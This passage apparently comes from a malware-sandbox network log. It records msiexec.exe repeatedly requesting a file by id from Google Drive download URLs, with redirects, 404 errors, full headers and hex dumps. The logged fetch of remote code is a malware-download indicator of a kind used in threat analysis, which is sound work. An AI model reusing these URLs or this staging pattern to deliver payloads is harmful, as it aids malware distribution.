                                                              2025-01-10 23:02:20 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:20 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgTWTk6Rnm6tHw3CUxkSbHBSNqRqmWJ-rLpAywEjnUSZpEXOaDvgXiG2sv1tywhr9DQo
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:20 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-YzHRFf_zHNuMlgTDexlLrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 4d 52 6c 69 6d 71 71 41 58 76 47 4a 6d 38 71 6c 36 54 34 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tMRlimqqAXvGJm8ql6T4pg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.849735216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:21 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:22 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:22 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-rk0cbAz84vXOS32KeytTzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.849736172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:22 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:23 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQbtT-SmhVWmbRcqzXReMvBwkPJ50Yw4cSFweR62CINTu7OcglTdyk0EDIsuebAxWIt
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:23 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-3Ufck2_7x0RIrS75j7neiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 6a 6b 31 45 66 32 30 66 6c 44 6d 63 56 78 78 4a 50 47 2d 50 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Qjk1Ef20flDmcVxxJPG-PA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.849737216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:24 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:24 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:24 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-0in2JmARNOQ2U8Q631e6UQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.849738172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:25 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:25 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC6M2NSFkfJFvcrBtQ_XHtvHGsKKJ6vXRXKJIpBUQsOTZ1hIO1-8TWika3XjNPQ42cm32P5sXNE
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:25 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-B3Toi5nMbhkHph8dgDbyBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 42 34 74 54 49 44 37 78 6a 73 61 30 4d 70 50 39 4a 48 6a 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DB4tTID7xjsa0MpP9JHjbQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.849739216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:26 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:26 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:26 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-ixsUNiJqISoTwa_1afyU5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.849740172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:27 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:27 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgRdwd7Fv5Kv1lH39iPGzoXRW3WHictUyQMuZKxBrVkmSuYPAz0Sgpqz52glCh0apQ8GCCMObYQ
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:27 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-uyqkNyigyjZ1nIZMWNBJYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:27 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 32 35 73 57 39 67 6e 46 6b 36 72 47 36 55 38 78 73 49 65 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="F25sW9gnFk6rG6U8xsIebw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.849741216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:28 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:28 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:28 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
